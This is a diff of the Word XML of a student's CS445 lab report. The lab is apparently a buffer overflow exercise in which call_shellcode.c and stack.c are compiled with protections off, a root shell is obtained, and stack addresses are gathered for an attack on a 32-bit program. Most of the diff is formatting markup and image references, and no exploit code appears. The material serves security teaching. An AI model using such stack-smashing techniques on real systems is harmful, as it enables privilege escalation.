--- a/Lab03/AustinDecker_CS445_Lab03-Report.docx
+++ b/Lab03/AustinDecker_CS445_Lab03-Report.docx
@@ -93,6 +93,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -187,6 +191,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="start"/>
         <w:rPr>
@@ -283,36 +291,23 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">The code </w:t>
-      </w:r>
-      <w:r>
+        <w:t>The code used for compilation was provided to me:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="start"/>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t>used for compilation</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> was provided to me:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="start"/>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
         </w:rPr>
       </w:r>
     </w:p>
@@ -1208,6 +1203,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading10"/>
+        <w:numPr>
+          <w:ilvl w:val="8"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
         <w:jc w:val="both"/>
@@ -1235,21 +1234,16 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
         <w:jc w:val="both"/>
@@ -1288,44 +1282,39 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">When running the makefile to compile the call_shellcode.c I noticed that the execstack was used during the compilation process. This is important as it allows the badfile to run code within the stack of the victim program. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>When running the makefile to compile the call_shellcode.c I noticed that the execstack was used during the compilation process. This is important as it allows the badfile to run code within the stack of the victim program. I also noticed the -m32 flag was used. This means that the program was compiled for 32bit architecture.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:bidi w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t>I also noticed the -m32 flag was used. This means that the program was compiled for 32bit architecture.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
         <w:t>When I ran the compiled program, I noticed that the program successfully gave me a root shell, as shown in the below screenshot.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -2676,20 +2665,331 @@
         <w:spacing w:before="0" w:after="140"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
+        <w:t>I compiled the provided code stack.c with the provided makefile and it compiled the code with the necessary flags to turn off the counter measures. The screenshot below shows the output from running the makefile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="5">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4116070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="4" name="Image4" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="Image4" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4116070"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>ask 03: Launching an attack on a 32bit system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Below is the screenshots of the process of getting the memory address of ebp and buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>52070</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>237490</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="5" name="Image5" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Image5" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="5455920"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="7">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>34290</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>56515</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="6" name="Image6" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="Image6" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="5455920"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:spacing w:before="0" w:after="140"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>35560</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>89535</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="7" name="Image7" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="Image7" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="5455920"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -2699,6 +2999,7 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
@@ -2834,8 +3135,130 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2847,14 +3270,12 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
         <w:kern w:val="2"/>
-        <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
       <w:pPr>
-        <w:widowControl/>
         <w:suppressAutoHyphens w:val="true"/>
       </w:pPr>
     </w:pPrDefault>
@@ -2864,7 +3285,10 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
       <w:bidi w:val="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:jc w:val="start"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
@@ -3140,10 +3564,6 @@
     <w:next w:val="TextBody"/>
     <w:qFormat/>
     <w:pPr>
-      <w:numPr>
-        <w:ilvl w:val="8"/>
-        <w:numId w:val="1"/>
-      </w:numPr>
       <w:spacing w:before="60" w:after="60"/>
       <w:outlineLvl w:val="8"/>
     </w:pPr>

--- a/Lab03/AustinDecker_CS445_Lab03-Report.docx
+++ b/Lab03/AustinDecker_CS445_Lab03-Report.docx
@@ -78,12 +78,12 @@
         <w:pStyle w:val="Title"/>
         <w:bidi w:val="0"/>
         <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -95,17 +95,17 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -193,17 +193,17 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="start"/>
         <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -1205,7 +1205,7 @@
         <w:pStyle w:val="Heading10"/>
         <w:numPr>
           <w:ilvl w:val="8"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
@@ -1242,7 +1242,7 @@
         <w:pStyle w:val="Heading3"/>
         <w:numPr>
           <w:ilvl w:val="2"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:spacing w:lineRule="auto" w:line="240"/>
@@ -1313,13 +1313,12 @@
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="3"/>
         </w:numPr>
         <w:bidi w:val="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1371,6 +1370,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -1378,6 +1378,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -2680,10 +2681,13 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2735,6 +2739,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -2742,6 +2747,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
@@ -2772,20 +2778,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -2798,35 +2794,53 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:drawing>
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>52070</wp:posOffset>
+              <wp:align>center</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>237490</wp:posOffset>
+              <wp:posOffset>635</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="6332220" cy="5455920"/>
+            <wp:extent cx="6332220" cy="4265295"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:wrapTopAndBottom/>
             <wp:docPr id="5" name="Image5" descr="" title=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2849,7 +2863,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6332220" cy="5455920"/>
+                      <a:ext cx="6332220" cy="4265295"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2860,32 +2874,16 @@
             </a:graphic>
           </wp:anchor>
         </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
